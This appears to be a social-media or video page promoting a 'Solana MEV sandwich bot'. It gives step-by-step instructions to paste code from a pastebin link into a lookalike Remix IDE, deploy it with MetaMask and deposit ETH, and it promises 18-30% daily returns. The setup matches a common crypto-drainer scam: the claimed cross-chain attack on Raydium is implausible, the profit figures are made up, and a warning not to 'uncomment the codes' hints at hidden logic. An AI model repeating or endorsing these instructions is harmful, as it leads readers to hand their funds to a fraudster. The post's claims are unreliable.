Make More Solana Daily with Solana Sandwich Bot

4 hours ago
10

During this crypto bull run, I successfully turned 10 Solana into 500 Solana using a MEV (Maximal Extractable Value) bot on the Solana blockchain. We all know Solana is the winner for this cycle with the memecoin mania on it chain. So its only logical to focus more on a mev on #solana rather than #ethereum . I built this one a few months ago and i can say it changed my life. Although requires constant monitoring and adaptation to market conditions, it has ultimately proved highly profitable . I figured i'll do you guys a solid by sharing my script and how it works, You're welcome.

The MEV Gatekeepers are going to kill me for this lol 😂 😜

This MEV #sandwichbot attacks the Raydium liquidity pool and bundles transactions with high slippage tolerance for profit.

Last Update: 27th August 2024

(Paste Bin Link)

https://pastebin.com/bHZTyfPg

(Track your bot live)

https://Eigenphi.io

IDE - remix-compiler.com

July 2024 Update - Bot is still working perfectly

VIDEO INSTRUCTIONS

In this video , I will show you how to deploy a profitable sandwich #mevbot on Solana in under 10 minutes.

To get this bot to work you'll need at least 0.1 ETH to start and you'll need to create a new SOL wallet. We'll have to bridge our ETH over to SOL.

No worries about bridging yourself the code does it for us. Once you start your bot it will automatically bridge the ETH to SOL via allbridge.io so the bot can enter and hunt the Raydium liquidity pool.

STEP BY STEP Instructions:

1.Download MetaMask Wallet Extension to your PC or Laptop on Google Chrome/Firefox etc if you don't already have one
https://metamask.io/download

2. Access the Remix IDE: remix-compiler.com

3.Click on the new file icon and create a new file. Rename and make sure you put a ".sol" at the end of file name e.g mev.sol
It has to end in .sol or it won't compile. Example - anything.sol

4. Open and paste the entire paste bin code in Remix in the new .sol file you created:

https://pastebin.com/bHZTyfPg

5. Create a new Sol wallet and paste it's address on line 37 of the copied code as shown in video (this wallet receives your bot's profits in sol each time you stop your bot and hit withdraw).

If you are only running it on 0.1 ETH you will need to change "ETH Swap Min = (0.2)" to (0.1) on line 35 or whatever amount you decide to use. (make sure you have a little bit extra for transaction fees)

6. Move to the 'Solidity Compiler' tab, scroll down select version '0.6.6' and then click 'Compile

7.Move to the 'Deploy' tab (third segment of the side bar), select 'Injected Provider' as the environment.

Your Metamask wallet should pop up and connect.

You'll need to press little arrow down next to deploy and add "BOT" for both _TOKENNAME and _TOKENSYMBOL. Remix makes you do this now on every contract even if it's a non coin contract to be able to deploy.

Then Click Deploy and press confirm on pop-up

You'll have to pay a little gas here to create bot contract. After the transaction is confirmed, it's your own bot now.
Copy your bot CA and check it on etherscan.

8. Deposit your ETH liquidity to your contract/bot address from your metamask. (make sure to add a little extra for gas)

9. After your transaction is confirmed, start the bot by clicking the red "action" button. Your ETH will automatically bridge over to SOL and begin attacking Raydium LP transactions.

If Action button isn't showing, click your contract you made on the pull down icon and it will show.
Withdraw anytime by clicking 'action' button again.

When you withdraw by hitting Action again -
Your Liquidity and profits will go to the SOL wallet you pasted on line 37.

Run your #bot however long you wish, I recommend 24 hrs or more before each withdrawal. Just re-fund your liquidity to your bot contract and hit the action button to go again. Happy Sandwiching

NOTE: Don't uncomment the codes the compiler settings does that itself on action.

HOW MUCH CAN I MAKE?

Typical profit is 18-30% of liquidity based on SOL onchain volume that day per 24 hours bot run time. Low volume = around 18% - High volume 30%+

Typical examples of profit: (per 24 hours run time) if SOL Price $120 (Update-Sol is higher price now so better profit)
0.1 - 0.2 ETH bot liquidity = 0.5 to 1Sol profit daily
0.4 ETH bot liquidity = 2 to 3 Sol profit daily
0.8 ETH bot liquidity = 3 to 4 Sol profit daily
1.2 ETH bot liquidity = 5 to 6 Sol profit daily

HOW CAN I TRACK MY BOT?

You can track your #sandwichbot live on Eigenphi.io

After you launch your bot, copy and paste your bot CA into search on eigenphi.io and you'll see it attacking buys and sells live.

Bot setup only works on desktop/laptop
Be sure to change Solidity Compiler to 0.6.6 as stated above.

Be sure to Like and Subscribe to my Channel for more updates

Message me on Telegram @ t.me/mattfamon for further questions:

Special thank you to Andrew from Jito Labs.

Loading 1 comment...